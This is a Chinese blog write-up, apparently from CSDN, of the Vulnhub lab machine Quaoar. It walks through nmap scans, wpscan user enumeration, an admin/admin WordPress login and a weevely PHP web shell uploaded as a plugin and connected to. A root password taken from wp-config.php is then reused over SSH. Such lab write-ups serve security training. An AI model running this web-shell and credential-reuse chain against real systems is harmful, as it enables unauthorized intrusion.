Vulnhub 靶机 Quaoar write up wordpresscms 漏洞利用上传插件 getshell wp-config 获取到数据库账号密码 用于ssh登录提权

这篇博客介绍了如何对名为Quaoar的靶机进行渗透测试,首先通过nmap探测IP和端口,发现WordPress CMS,并利用弱口令和上传插件漏洞获取webshell。接着通过wp-config.php找到数据库中的root密码,最终使用SSH登录实现提权。整个过程展示了渗透测试的基本步骤和技术。
摘要由CSDN通过智能技术生成

0x00 环境搭建

  • 下载地址
    https://download.vulnhub.com/hackfest2016/Quaoar.ova
  • 运行环境
    Virtual Box 仅主机网络
    kali 搭建同网卡
  • 目标
    root权限 flag文件

0x01 信息收集

  • 靶机ip探测

      nmap -sP 192.168.56.0/24
    

192.168.56.109
在这里插入图片描述

  • 端口服务探测识别

       nmap -sC -sV -A -p- 192.168.56.109 -o port.txt
    

22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.8.1-P1

80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?

Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5

在这里插入图片描述

0x02 漏洞挖掘

  • 先以80 web为 入口点测试

步骤一:80端口web测试

(1)网站首页只有一张图片 没有任何功能点
在这里插入图片描述
(2)robots.txt 查看 目录扫描
在这里插入图片描述
之后就可以转为 wordpress cms漏洞利用

步骤二:wordpress cms漏洞利用

版本 在这里插入图片描述

(1)wpscan --url http://192.168.56.109/wordpress --wp-content-dir wp-content --enumerate u

发现两个用户 admin 和wpuser
在这里插入图片描述
(2)尝试登录后台
http://192.168.56.109/wordpress/wp-login.php
admin admin 弱口令登录成功

通过在插件上传木马 getshell

(1)
在这里插入图片描述
(2)kali 工具

	weevely generate shell back.php

在这里插入图片描述

在这里插入图片描述
(3)上传后的插件都存在于 wp-content-uploads 目录
在这里插入图片描述
(4) kali 工具 连接木马

weevely http://192.168.56.109/wordpress/wp-content/uploads/2021/12/back.php shell

在这里插入图片描述

0x03 提权

步骤三:提权

(1)由于是 wordpress 先去网站根目录查看 数据库文件
wp-config.php
可能存在root密码
在这里插入图片描述
(2)尝试ssh登录
在这里插入图片描述
登录成功

MD5解密 flag为

QuaoarIsAwesome
Quaoar太棒了

0x04 总结

该靶机比较简单,利用wordpress 弱口令进入后台后,利用上传插件漏洞getshell,之后再wp-config.php 数据库配置文件中 看到个root和密码 尝试 ssh登录提权成功。

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值